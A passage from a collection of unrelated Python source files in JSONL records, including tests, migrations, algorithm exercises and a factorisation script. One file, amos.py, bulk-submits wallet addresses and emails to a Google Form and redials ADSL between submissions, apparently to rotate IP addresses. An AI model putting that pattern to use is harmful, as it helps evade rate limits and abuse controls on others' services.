날짜의 일\n next_month : 두 번째 날짜의 월\n next_day : 두 번째 날짜의 일\n\n Example:\n >>> 1 : input T\n >>> 7 17 12 24 : input test case\n >>> #1 161 : output\n \"\"\"\n T = int(input())\n test_case = [list(map(int, input().split())) for t in range(T)]\n month = [0, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n\n for t in range(1, T+1):\n result = 0\n pre_month, pre_day, next_month, next_day = test_case[t-1][0], test_case[t-1][1], test_case[t-1][2], test_case[t-1][3]\n\n if next_month - pre_month > 0:\n for m in range(pre_month+1, next_month):\n result += month[m]\n result += month[pre_month] - pre_day + next_day + 1\n else:\n result = next_day - pre_day + 1\n \n print(f'#{t} {result}')\n\nsolution()","sub_path":"D2_1948_DateCalculator.py","file_name":"D2_1948_DateCalculator.py","file_ext":"py","file_size_in_byte":2334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"255135518","text":"import unittest\nfrom tests.ggrc import TestCase\nfrom ggrc.models import get_model\nfrom ggrc.models import all_models\nfrom tests.ggrc.api_helper import Api\nfrom tests.ggrc.generator import Generator\nfrom tests.ggrc.generator import GgrcGenerator\n\n\nclass TestCreator(TestCase):\n def setUp(self):\n TestCase.setUp(self)\n\n self.generator = Generator()\n self.api = Api()\n self.ggrc_generator = GgrcGenerator()\n self.maxDiff = None\n self._generate_users()\n\n def _generate_users(self):\n users = [('creator', 'Creator'), ('admin', 'gGRC Admin')]\n for (name, role) in users:\n _, user = self.ggrc_generator.generate_person(\n data={\"name\": name}, user_role=role)\n setattr(self, name, user)\n\n def test_creator_can_crud_basic_models(self):\n self.api.set_user(self.creator)\n all_errors = []\n base_models = set([\n 'Control', 'ControlAssessment', 'DataAsset', 'Contract',\n 'Policy', 'Regulation', 'Standard', 'Document', 'Facility',\n 'Market', 'Objective', 'OrgGroup', 'Vendor', 'Product',\n 'Clause', 'System', 'Process', 'Issue', 'Project'\n ])\n for model_singular in base_models:\n try:\n model = get_model(model_singular)\n table_singular = model._inflector.table_singular\n table_plural = model._inflector.table_plural\n # Test POST creation\n response = self.api.post(model, {\n table_singular: {\n \"title\": model_singular,\n \"context\": None,\n \"reference_url\": \"ref\",\n \"contact\": {\n \"type\": \"Person\",\n \"id\": self.creator.id,\n },\n },\n })\n if response.status_code != 201:\n all_errors.append(\"{} post creation failed {} {}\".format(\n model_singular, response.status, response.data))\n continue\n\n # Test GET when not owner\n obj_id = response.json.get(table_singular).get('id')\n response = self.api.get(model, obj_id)\n if response.status_code != 403: # we are not onwers yet\n all_errors.append(\n \"{} can retrieve object if not owner\".format(model_singular))\n continue\n response = self.api.get_collection(model, obj_id)\n collection = response.json.get(\n \"{}_collection\".format(table_plural)).get(table_plural)\n if len(collection) != 0:\n all_errors.append(\n \"{} can retrieve object if not owner (collection)\".format(model_singular))\n continue\n # Become an owner\n response = self.api.post(all_models.ObjectOwner, {\"object_owner\": {\n \"person\": {\n \"id\": self.creator.id,\n \"type\": \"Person\",\n }, \"ownable\": {\n \"type\": model_singular,\n \"id\": obj_id\n }, \"context\": None},\n })\n if response.status_code != 201:\n all_errors.append(\"{} can't create owner {}.\".format(\n model_singular, response.status))\n continue\n\n # Test GET when owner\n response = self.api.get(model, obj_id)\n if response.status_code != 200:\n all_errors.append(\"{} can't GET object {}\".format(\n model_singular, response.status))\n continue\n\n # Test GET collection when owner\n response = self.api.get_collection(model, obj_id)\n collection = response.json.get(\n \"{}_collection\".format(table_plural)).get(table_plural)\n if len(collection) == 0:\n all_errors.append(\n \"{} cannot retrieve object even if owner (collection)\".format(model_singular))\n continue\n except:\n all_errors.append(\"{} exception thrown\".format(model_singular))\n raise\n self.assertEquals(all_errors, [])\n\n def test_creator_search(self):\n self.api.set_user(self.admin)\n self.api.post(all_models.Regulation, {\n \"regulation\": {\"title\": \"Admin regulation\", \"context\": None},\n })\n self.api.set_user(self.creator)\n response = self.api.post(all_models.Policy, {\n \"policy\": {\"title\": \"Creator Policy\", \"context\": None},\n })\n obj_id = response.json.get('policy').get('id')\n self.api.post(all_models.ObjectOwner, {\"object_owner\": {\n \"person\": {\n \"id\": self.creator.id,\n \"type\": \"Person\",\n }, \"ownable\": {\n \"type\": \"Policy\",\n \"id\": obj_id,\n }, \"context\": None},\n })\n response, _ = self.api.search('Regulation,Policy')\n entries = response.json['results']['entries']\n self.assertEquals(len(entries), 1)\n self.assertEquals(entries[0]['type'], \"Policy\")\n response, _ = self.api.search('Regulation,Policy', counts=True)\n self.assertEquals(response.json['results']['counts']['Policy'], 1)\n self.assertEquals(\n response.json['results']['counts'].get('Regulation'), None)\n\n def _get_count(self, obj):\n response, _ = self.api.search(obj, counts=True)\n return response.json['results']['counts'].get(obj)\n\n def test_creator_should_see_all_users(self):\n self.api.set_user(self.admin)\n admin_count = self._get_count('Person')\n self.api.set_user(self.creator)\n creator_count = self._get_count('Person')\n self.assertEquals(admin_count, creator_count)\n\n def test_creator_cannot_become_owner(self):\n self.api.set_user(self.admin)\n _, obj = self.generator.generate(all_models.Regulation, \"regulation\", {\n \"regulation\": {\"title\": \"Test regulation\", \"context\": None},\n })\n self.api.set_user(self.creator)\n response = self.api.post(all_models.ObjectOwner, {\"object_owner\": {\n \"person\": {\n \"id\": self.creator.id,\n \"type\": \"Person\",\n }, \"ownable\": {\n \"type\": \"Regulation\",\n \"id\": obj.id,\n }, \"context\": None},\n })\n self.assertEquals(response.status_code, 403)\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"src/tests/ggrc_basic_permissions/test_creator.py","file_name":"test_creator.py","file_ext":"py","file_size_in_byte":5945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"429995588","text":"import pandas as pd\n\nnato_data = pd.read_csv(\"nato_phonetic_alphabet.csv\")\n# Create a dictionary from this data\nnato_dict = {row.letter: row.code for (index, row) in nato_data.iterrows()}\n\nuser_input = input(\"Enter a word: \")\nnato_words = [nato_dict[letter.upper()] for letter in user_input]\n\nprint(nato_words)\n","sub_path":"26/challenge/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"430269438","text":"\"\"\"migration v0.1\n\nRevision ID: 1cf17229dc4\nRevises: 51f5ccfba190\nCreate Date: 2017-05-14 16:25:30.902016\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '1cf17229dc4'\ndown_revision = '51f5ccfba190'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('dbinfos',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.Text(), nullable=True),\n sa.Column('ip', sa.Integer(), nullable=True),\n sa.Column('port', sa.Integer(), nullable=True),\n sa.Column('dbname', sa.Text(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('monilogs',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('monitor_log', sa.Text(), nullable=True),\n sa.Column('timestamp', sa.DateTime(), nullable=True),\n sa.Column('db_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['db_id'], ['dbinfos.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index('ix_monilogs_timestamp', 'monilogs', ['timestamp'], unique=False)\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_index('ix_monilogs_timestamp', 'monilogs')\n op.drop_table('monilogs')\n op.drop_table('dbinfos')\n ### end Alembic commands ###\n","sub_path":"migrations_bak/versions/1cf17229dc4_migration_v0_1.py","file_name":"1cf17229dc4_migration_v0_1.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"155410339","text":"from datetime import datetime\n\nimport pytest\nfrom city_scrapers_core.constants import COMMISSION, PASSED, TENTATIVE\nfrom freezegun import freeze_time\nfrom tests.utils import file_response\n\nfrom city_scrapers.spiders.chi_ssa_25 import ChiSsa25Spider\n\ntest_response = file_response(\n 'files/chi_ssa_25.html', 'http://littlevillagechamber.org/2019-meetings-minutes/'\n)\nspider = ChiSsa25Spider()\n\nfreezer = freeze_time('2019-03-17')\nfreezer.start()\n\nparsed_items = [item for item in spider.parse(test_response)]\n\nfreezer.stop()\n\n\ndef test_title():\n assert parsed_items[0]['title'] == 'Commission: Monthly'\n\n\ndef test_start():\n assert parsed_items[0]['start'] == datetime(2019, 1, 15, 9)\n assert parsed_items[-1]['start'] == datetime(2019, 12, 17, 9)\n\n\ndef test_end():\n assert parsed_items[0]['end'] == datetime(2019, 1, 15, 10)\n assert parsed_items[-1]['end'] == datetime(2019, 12, 17, 10)\n\n\ndef test_id():\n assert parsed_items[0]['id'] == 'chi_ssa_25/201901150900/x/commission_monthly'\n\n\ndef test_status():\n assert parsed_items[0]['status'] == PASSED\n assert parsed_items[-1]['status'] == TENTATIVE\n\n\ndef test_location():\n assert parsed_items[0]['location'] == {\n 'name': 'LV Chamber',\n 'address': '3610 W. 26th St. 2nd Floor Chicago, IL',\n }\n assert parsed_items[-1]['location'] == {\n 'name': 'Nuevo Leo Restaurant',\n 'address': '3657 W 26th St. 2nd Floor Chicago, IL',\n }\n\n\ndef test_source():\n assert parsed_items[0]['source'] == 'http://littlevillagechamber.org/2019-meetings-minutes/'\n\n\ndef test_links():\n assert parsed_items[0]['links'] == [{\n 'href':\n 'http://littlevillagechamber.org/wp-content/uploads/2019/03/SSA-Jan.-15.-2019-Meeting-Minutes.pdf', # noqa\n 'title': 'Minutes'\n }]\n assert parsed_items[-1]['links'] == []\n\n\n@pytest.mark.parametrize('item', parsed_items)\ndef test_classification(item):\n assert item['classification'] == COMMISSION\n","sub_path":"tests/test_chi_ssa_25.py","file_name":"test_chi_ssa_25.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"305340258","text":"# -*- coding: utf-8 -*-\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.action_chains import ActionChains\nimport time\n\nclass Amos:\n def __init__(self, drvier, input_dict):\n self.driver = drvier\n self.input_dict = input_dict\n\n\n def auto_process(self):\n self.driver.get('https://docs.google.com/forms/d/e/1FAIpQLScyC2izxDvE9WSSdY8eLFIus-kedcdQrdW9UB4LCL0ku6JmjQ/viewform')\n element = WebDriverWait(self.driver, 30, 0.5).until(\n EC.presence_of_element_located((By.ID, \"mG61Hd\")))\n\n #1.input every para\n inputs = self.driver.find_elements_by_tag_name('input')\n for input in inputs:\n if input is not None:\n label_name = input.get_attribute('aria-label')\n if label_name is None:\n continue\n time.sleep(1)\n try:\n input.send_keys(self.input_dict[label_name])\n except:\n print('Input fail : ', label_name)\n\n # labels = self.driver.find_elements_by_tag_name('label')\n # for label in labels:\n # if label is not None:\n # time.sleep(1)\n # checkbox = label.find_element_by_tag_name('span')\n # ActionChains(self.driver).move_to_element(checkbox).click(checkbox).perform()\n\n\n button = self.driver.find_element_by_xpath(\"//div[@role='button']\").find_element_by_tag_name('span')\n button.click()\n\n\n\nif __name__ == \"__main__\":\n import xlrd\n import configparser\n from dial_adsl import Adsl\n\n cf = configparser.ConfigParser()\n cf.read('config.ini')\n\n username = cf.get('adsl', 'username')\n password = cf.get('adsl', 'password')\n print(username, password)\n adsl = Adsl(username, password)\n\n input_file = cf.get('input', 'file')\n book = xlrd.open_workbook(input_file)\n sheet = book.sheet_by_index(0)\n print(sheet.name)\n\n for row_index in range(1, sheet.nrows):\n driver = webdriver.Chrome()\n\n wallet = sheet.cell(row_index, 0).value\n email = sheet.cell(row_index, 1).value\n input_para = {}\n input_para['Eth Wallet address 錢包地址 '] = wallet\n input_para['Email'] = email\n\n with open('result.txt', 'a') as fw:\n try:\n shop = Amos(driver, input_para)\n shop.auto_process()\n except:\n fw.write(\"ERROR: \" + wallet + ', ' + email+'\\n')\n print(\"ERROR: \" + wallet + ', ' + email+'\\n')\n else:\n fw.write(\"SUCCE: \" + wallet + ', ' + email+'\\n')\n print(\"SUCCE: \" + wallet + ', ' + email+'\\n')\n finally:\n driver.quit()\n\n adsl.dial()\n\n\n","sub_path":"amos.py","file_name":"amos.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"557432816","text":"from __future__ import division\nfrom numpy import *\nfrom scipy import *\nfrom matplotlib.pyplot import *\nfrom math import *\nfrom pylab import *\n\nn = 100 # number of points\ndx = 0.1 # change in x\nw = 0.4 # weight per unit length\n\n\n# First Derivative Function\ndef diff(a):\n # D1: creating a nxn matrix to calculate 1st derivative of y\n d1 = [[0 for i in range(n)] for j in range(n)]\n # first row is different\n d1[0][0] = -3\n d1[0][1] = 4\n d1[0][2] = -1\n # last row is different\n d1[n - 1][n - 3] = 1\n d1[n - 1][n - 2] = -4\n d1[n - 1][n - 1] = 3\n # creating the rows in between 1st row and last row\n for i in range(n - 2):\n d1[i + 1][i] = -1\n d1[i + 1][i + 2] = 1\n return 1 / (2 * dx) * matmul(d1, a) # matmul=matrix multiplication\n\n\n# Second Derivative Function\ndef d_diff(a):\n # D2: creating a nxn matrix to calculate second derivative of y\n d2 = [[0 for i in range(n)] for j in range(n)]\n # first row is different\n d2[0][0] = 1\n d2[0][1] = -2\n d2[0][2] = 1\n # last row is different\n d2[n - 1][n - 3] = 1\n d2[n - 1][n - 2] = -2\n d2[n - 1][n - 1] = 1\n # creating the rows in between 1st row and last row\n for i in range(n - 2):\n d2[i + 1][i] = 1\n d2[i + 1][i + 1] = -2\n d2[i + 1][i + 2] = 1\n return 1 / (dx ** 2) * matmul(d2, a) # matmul=matrix multiplication","sub_path":"Derivatives.py","file_name":"Derivatives.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"342867510","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('visit', '0076_staff_secondary_schools'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='staff',\n name='secondary_schools',\n field=models.ManyToManyField(related_name='secondary_staff', to='visit.School'),\n ),\n ]\n","sub_path":"visit/migrations/0077_auto_20150828_2100.py","file_name":"0077_auto_20150828_2100.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"510585842","text":"import pygame\nimport pickle\nfrom pygame.locals import *\n\n# SETUP *****************************************\n\npygame.init()\nSCREEN = WIDTH, HEIGHT = 288, 512\nwin = pygame.display.set_mode(SCREEN, pygame.SCALED | pygame.FULLSCREEN)\nclock = pygame.time.Clock()\nFPS = 45\n\nt = 16\nROWS, COLS = HEIGHT // 16, WIDTH // 16\n\nt_list = []\nfor i in (7,8,24,15,16):\n\ttile = pygame.image.load(f\"tiles/{i}.png\")\n\ttile = pygame.transform.rotate(tile, -90)\n\tt_list.append(tile)\n\n\nrunning = True\nwhile running:\n\tfor event in pygame.event.get():\n\t\tif event.type == pygame.QUIT:\n\t\t\trunning = False\n\t\t\t\n\tfor c in range(COLS):\n\t\tfor r in range(ROWS):\n\t\t\tif c in (0,1,2,3,4,5):\n\t\t\t\twin.blit(t_list[2], (c*t, r * t))\n\t\t\tif c == 6:\n\t\t\t\twin.blit(t_list[4], (c*t, r*t))\n\t\t\tif c in (7,8,9,10):\n\t\t\t\twin.blit(t_list[1], (c*t, r*t))\n\t\t\tif c == 11:\n\t\t\t\twin.blit(t_list[3], (c*t, r*t))\n\t\t\tif c in (12,13,14,15,16,17):\n\t\t\t\twin.blit(t_list[0], (c*t, r*t))\n\t\t\t\t\n\tpygame.image.save(win, \"bg.png\")\n\t\t\t\t\n\tclock.tick(FPS)\n\tpygame.display.update()\n\t\t\t\npygame.quit()","sub_path":"Level Designer/Level Editor for pydroid3/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"328598773","text":"# Load libraries\nfrom sklearn.datasets import load_boston\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.metrics import roc_auc_score, accuracy_score, f1_score, roc_curve, auc\nfrom sklearn.preprocessing import PolynomialFeatures\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef build_model(X,y,n_estimators=500):\n \"\"\"\n Build a Gradient Boost regression model\n \"\"\"\n model = GradientBoostingClassifier(n_estimators=n_estimators,verbose=10,\\\n subsample=0.7, learning_rate= 0.15,max_depth=3,random_state=77)\n model.fit(X,y)\n return model \n\ndef view_model(model):\n \"\"\"\n \"\"\"\n print(\"\\n Training scores\")\n print(\"======================\\n\")\n for i,score in enumerate(model.train_score_):\n print(\"\\tEstimator %d score %0.3f\"%(i+1,score))\n\n plt.cla()\n plt.figure(1)\n plt.plot(range(1,model.estimators_.shape[0]+1),model.train_score_)\n plt.xlabel(\"Model Sequence\")\n plt.ylabel(\"Model Score\")\n plt.show()\n\n print(\"\\n Feature Importance\")\n print(\"======================\\n\")\n for i,score in enumerate(model.feature_importances_):\n print(\"\\tFeature %d Importance %0.3f\"%(i+1,score))\n \n \n\ndef model_worth(y_test,predicted_y, n_classes=2):\n \"\"\"\n Evaluate the model\n \"\"\"\n print(\"\\tAccuracy score = %0.2f\"%(accuracy_score(y_test,predicted_y)))\n print(\"\\tROC AUC = %0.2f\"%(roc_auc_score(y_test, predicted_y)))\n print(\"\\tF1 score = %0.2f\"%(f1_score(y_test, predicted_y)))\n\n\ndef make_roc(name, clf, y_test, X_test, ax=None, labe=5, proba=True, skip=0):\n initial = False\n if not ax:\n ax = plt.gca()\n initial = True\n if proba:\n fpr, tpr, thresholds = roc_curve(y_test, clf.predict_proba(X_test)[:, 1])\n else:\n fpr, tpr, thresholds = roc_curve(y_test, clf.decision_function(X_test))\n roc_auc = auc(fpr, tpr)\n if skip:\n l = fpr.shape[0]\n ax.plot(fpr[0:l:skip], tpr[0:l:skip], '.-', alpha=0.3,\n label='ROC curve for %s (area = %0.2f)' % (name, roc_auc))\n else:\n ax.plot(fpr, tpr, '.-', alpha=0.3, label='ROC curve for %s (area = %0.2f)' % (name, roc_auc))\n label_kwargs = {}\n label_kwargs['bbox'] = dict(\n boxstyle='round,pad=0.3', alpha=0.2,\n )\n for k in list(range(0, fpr.shape[0], labe)):\n # from https://gist.github.com/podshumok/c1d1c9394335d86255b8\n threshold = str(np.round(thresholds[k], 2))\n ax.annotate(threshold, (fpr[k], tpr[k]), **label_kwargs)\n if initial:\n ax.plot([0, 1], [0, 1], 'k--')\n ax.set_xlim([0.0, 1.0])\n ax.set_ylim([0.0, 1.05])\n ax.set_xlabel('False Positive Rate')\n ax.set_ylabel('True Positive Rate')\n ax.set_title('ROC')\n ax.legend(loc=\"lower right\")\n return ax\n\nif __name__ == \"__main__\":\n pass","sub_path":"analysis/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"637870055","text":"# This implementation of breath first search is build for a adjancency list graph structure,\n# where you have an array and each index of the array is a node in the graph,\n# each graph[index] has another list that represent the node that can be reached from the node \"index\"\nfrom collections import deque\ndef bfs(graph,node):\n visited = set([node])\n queue = deque()\n queue.append(node)\n\n # this variable path is not necesary but we used just to return the path of node that\n # our algorithm has visited at any iteration\n path = [node]\n\n while queue:\n current_node = queue.popleft()\n for n in range(len(graph[current_node])):\n if graph[current_node][n] not in visited:\n visited.add(graph[current_node][n])\n queue.append(graph[current_node][n])\n path.append(graph[current_node][n])\n\n return path\n\n# Testing the algorithm\ngraph = [[1,2],[4,5],[3],[],[],[6,7],[],[]]\n\"\"\"\n 0\n | |\n 1 2 \n | | | \n 4 5 3\n | |\n 6 7\n \n\"\"\"\npth = bfs(graph,0)\nprint(pth)","sub_path":"venv/Graphs/Traversal/breath_first_search.py","file_name":"breath_first_search.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"220569282","text":"import numpy as np\r\nfrom random import randint\r\nimport time \r\n\r\n#%%\r\n# Test pour savoir si le nombre premier ou non \r\ndef NombrePremier(p):\r\n if(p == 2):\r\n return True,1\r\n\r\n if(p == 1 or p%2==0):\r\n return False,2\r\n\r\n return Rabin_Miller(p, 50,2)\r\n\r\n# Rabin Millier Test Nombre Premier\r\ndef Rabin_Miller(p, iterations,count):\r\n r=0\r\n s=p-1\r\n p=int(p)\r\n \r\n Premier=True\r\n count+=1\r\n while(s%2==0):\r\n count+=1 \r\n r+= 1\r\n s=int(s// 2)\r\n\r\n for i in range(0,iterations):\r\n a = randint(2,p-1)\r\n x = pow(a, s, p)\r\n \r\n count+=3\r\n if(x==1 or x==(p-1)):\r\n continue\r\n \r\n for j in range(r-1):\r\n x = pow(x,2,p)\r\n count+=1\r\n if(x==p-1):\r\n break\r\n else:\r\n Premier=False\r\n \r\n return Premier,count\r\n#%%\r\n\"\"\"\r\n Factorisation de Lenstra par les courbes elliptiques\r\n \r\n Algo Probabiliste rapide pour la décomposition en produit de facteurs premiers\r\n qui emploie les courbes elliptiques\r\n \r\n Amélioration de l'algo p-1 Pollard\r\n \r\n \r\n Etapes de L'Algorithme\r\n \r\n 1)\r\n Prendre une courbe elliptique aléatoire sur Z avec un point A sur elle. \r\n Alors, nous considérons la loi de groupe sur cette courbe modulo n - ceci est possible \r\n car la plupart des résidus modulo n ont des inverses, \r\n qui peuvent être trouvés en utilisant l'algorithme d'Euclide \r\n et en trouvant un résidu non-inversible équivalent à la factorisation de n\r\n \r\n 2) \r\n Calculer eA dans ce groupe, où e est le produit de petits nombres premiers \r\n élevés aux petites puissances, comme dans la méthode p−1 de Pollard. \r\n Il peut donner un nombre premier en une fois, et est ainsi efficace.\r\n \r\n 3)\r\n Avec un peu de chance, eA est l'élément nul du groupe de la courbe elliptique dans Fp, \r\n mais pas dans Fq pour un autre diviseur premier q de n \r\n (comme dans la méthode p−1 de Pollard, il est très improbable que les deux groupes \r\n aient un ordre qui soit un diviseur de e). \r\n Alors nous pouvons trouver un facteur de n \r\n en calculant le PGCD de la première coordonnée de A et n, \r\n car cette coordonnée sera nulle dans Fp\r\n \r\n 4)\r\n Si cela ne marche pas, \r\n il suffit de recommencer avec une autre courbe ou un autre point de départ.\r\n\r\n\r\n Complexité\r\n \r\n Dépend de la taille du facteur.\r\n Elle peut être exprimée par O(e(√2 + o(1)) √ln p ln ln p)\r\n où p est le plus petit facteur de n.\r\n\r\n\"\"\"\r\n#%%\r\n\r\n# Determine l'inverse d'un nombre dans Z/nZ / Algo + optimisé\r\n# Algorithme Euclide Etendu \r\ndef extended_gcd(a, b):\r\n count=0\r\n r, reste = abs(a), abs(b)\r\n x, u, y, v = 0, 1, 1, 0\r\n while reste:\r\n count+=1 # while reste:\r\n r, (quotient, reste) = reste, divmod(r, reste)\r\n x, u = u - quotient*x, x\r\n y, v = v - quotient*y, y\r\n return r, u * (-1 if a < 0 else 1), v * (-1 if b < 0 else 1),count\r\n\r\n\r\n# P=(x1,y1)\r\n# Q=(x2,y2)\r\n\r\n# Addition de points d'une courbe elliptique dans Z/nZ\r\ndef Addition_Point(P,Q,Fp):\r\n count=0\r\n count+=1 # if(P =='O'): \r\n if(P =='O'): \r\n return Q,count\r\n count+=1 # if(Q =='O'):\r\n if(Q =='O'): \r\n return P,count\r\n \r\n # x1 = x2 && y1 = -y2 => P = -Q\r\n count+=1+1+1+1+1+1+1 # if ( P[0]%Fp == Q[0]%Fp) and ( P[1]%Fp == -Q[1]%Fp): \r\n if ( P[0]%Fp == Q[0]%Fp) and ( P[1]%Fp == -Q[1]%Fp): \r\n return 'O',count\r\n \r\n # Si x1 = x2 && y1 = y2 => P = Q \r\n count+=1+1+1+1+1+1+1 # if (P[0]%Fp == Q[0]%Fp) and ( P[1]%Fp == Q[1]%Fp): \r\n if (P[0]%Fp == Q[0]%Fp) and ( P[1]%Fp == Q[1]%Fp): \r\n \r\n a=randint(2,Fp-1)\r\n \r\n # m= (3*x1² + a) / 2y1\r\n num= ( (3*(P[0]**2) )+ a )%Fp\r\n \r\n ### Renvoie Inverse de denom ou retourne denom si il n'a pas d'inverse (utile pr Lenstra)\r\n \r\n # Euclide Etendu \r\n denom=2*P[1]\r\n count+=1 # P[1]\r\n g,x,y,c=extended_gcd(denom,Fp)\r\n count+=c # extended_gcd(denom,Fp)\r\n count+=1 #if(g!=1):\r\n if(g!=1):\r\n #print(\"Pas d inverse pour : \"+str(denom)+\"%\"+str(Fp))\r\n return [denom,'No Inverse'],count ### Lenstra retourne d \r\n \r\n #On inverse denom si il a un inverse\r\n denom_inv=(x%Fp)\r\n \r\n m=num*denom_inv\r\n \r\n # x3 = m²-2x1\r\n x3=( (m**2)-2*P[0]) %Fp \r\n count+=1 # P[0]\r\n \r\n # Si x1 != x2 && y1!=y2 => P != Q \r\n else :\r\n # m=(y2-y1)/(x2-x1)\r\n num=( Q[1] - P[1])%Fp\r\n count+=1+1 # Q[1] P[1]\r\n \r\n ### Renvoie Inverse de denom ou retourne denom si il n'a pas d'inverse (utile pr Lenstra) \r\n # Euclide Etendu \r\n count+=1+1 # Q[0] - P[0]\r\n denom=Q[0] - P[0]\r\n g,x,y,c=extended_gcd(denom,Fp)\r\n count+=c # extended_gcd(denom,Fp)\r\n count+=1 #if(g!=1):\r\n if(g!=1):\r\n #print(\"Pas d inverse pour : \"+str(denom)+\"%\"+str(Fp))\r\n return [denom,'No Inverse'],count\r\n \r\n #On inverse denom si il a un inverse \r\n denom_inv=(x%Fp)\r\n \r\n m=num*denom_inv\r\n \r\n # x3 = m²-x1-x2\r\n count+=1+1 # P[0]-Q[0] ) \r\n x3 =( (m**2)-P[0]-Q[0] ) \r\n\r\n # (x3, -y1 + m*(x1-x3) )\r\n count+=1+1 # P[0] - x3 ) - P[1])\r\n return ([ x3%Fp ,( m *( P[0] - x3 ) - P[1]) %Fp]),count\r\n\r\n\r\n# Test For Addition \r\n\"\"\"\r\nprint(\"Test Addition \")\r\n\r\na=2\r\nFp=97\r\n\r\nP=[15,6]\r\nQ=[5,9]\r\n\r\nprint(\"Coord use : P = \"+str(P)+\" , Q = \"+str(Q)+\" , n = \"+str(Fp) )\r\nprint(Addition_Point(P,Q,Fp) )\r\nprint(\"\")\r\n\r\n\r\n# No inversible\r\nP=[2,11]\r\nQ=[2,11]\r\nFp=36\r\nprint(\"No Inversible Test for lenstra\")\r\nprint(\"Coord use : P = \"+str(P)+\" , Q = \"+str(Q)+\" , n = \"+str(Fp) )\r\nprint(Addition_Point(P,Q,Fp) )\r\nprint(\"\")\r\n\r\nprint(\"Test Inversible\")\r\nprint(modinv(3,Fp))\r\nprint(\"\")\r\n\"\"\"\r\n\r\n#----------------------------------------------------------------\r\n\r\n#----------------------------------------------------------------\r\n\r\n\r\n#%%\r\n# Multiplication nP (Addition nP = P + P + P + ... + P n fois)\r\ndef Multiplication_Points(n,P,Fp):\r\n result = 'O'\r\n pow_2P = P\r\n count=0\r\n while(n!=0): \r\n count+=1 # while(n !=0):\r\n count+=1+1 # if(pow_2P[1]!='No Inverse'):\r\n \r\n if(pow_2P[1]!='No Inverse'):\r\n if (n%2==1):\r\n res = Addition_Point( pow_2P , result,Fp)\r\n\r\n result=res[0]\r\n\r\n count+=res[1]\r\n count+=1+1 #if(result[1]=='No Inverse'):\r\n if(result[1]=='No Inverse'):\r\n return result,count\r\n res=Addition_Point( pow_2P , pow_2P,Fp)\r\n pow_2P =res[0]\r\n count+=res[1]\r\n #print(\"n = \"+str(n))\r\n #print(\"pow_2P = \"+str(pow_2P))\r\n #print(\"result = \"+str(result))\r\n #print(\"\")\r\n n=n//2\r\n else:\r\n return pow_2P,count\r\n \r\n return result,count\r\n\r\n\"\"\"\r\nprint(\"Test Mult No inverse\")\r\nprint(Multiplication_Points(2,P,Fp))\r\nprint(\"\")\r\n\"\"\"\r\n\r\n\"\"\"\r\nprint(\"Test Multiplication nP\")\r\nprint(\"\")\r\n\r\na=2\r\nb=3\r\nn=4\r\nFp=1999\r\nP=[3,6]\r\n\r\nprint(\"Values are : n = \"+str(n)+\" , a = \"+str(a)+\" , Fp = \"+str(Fp)+\" , P = \"+str(P))\r\nprint(\"nP value is : \"+str(Multiplication_Points(n,P,Fp) ) )\r\n\r\n\"\"\"\r\n\r\n\r\n# Algorithme Crible Erasthothène \r\n# Retourne la liste de tous les nombres premiers <= n\r\ndef Erasthothene(n):\r\n count=0\r\n # créer une liste l de 2 à n \r\n L=list(range(2,n+1))\r\n count+=1\r\n \r\n i=2\r\n \r\n while(i<=np.sqrt(n)):\r\n count+=1\r\n # Si i dans la liste, sinn supprimer ses multiples\r\n count+=1\r\n if(i in L):\r\n #j donne des multiples de i, on commence de 2*i et on incrémente i par i (exemple i=2 on fait +2)\r\n for j in range(i*2,n+1,i):\r\n #Suppression des multiples s'ils sont trouvés dans la liste\r\n count+=1\r\n if(j in L):\r\n count+=1\r\n L.remove(j)\r\n i=i+1\r\n count+=1\r\n return L,count\r\n#%%\r\n\r\nlenstra_list_factor=[]\r\n#----------------------------------------------------------------------\r\n#------- ALGO LENSTRA ------------ 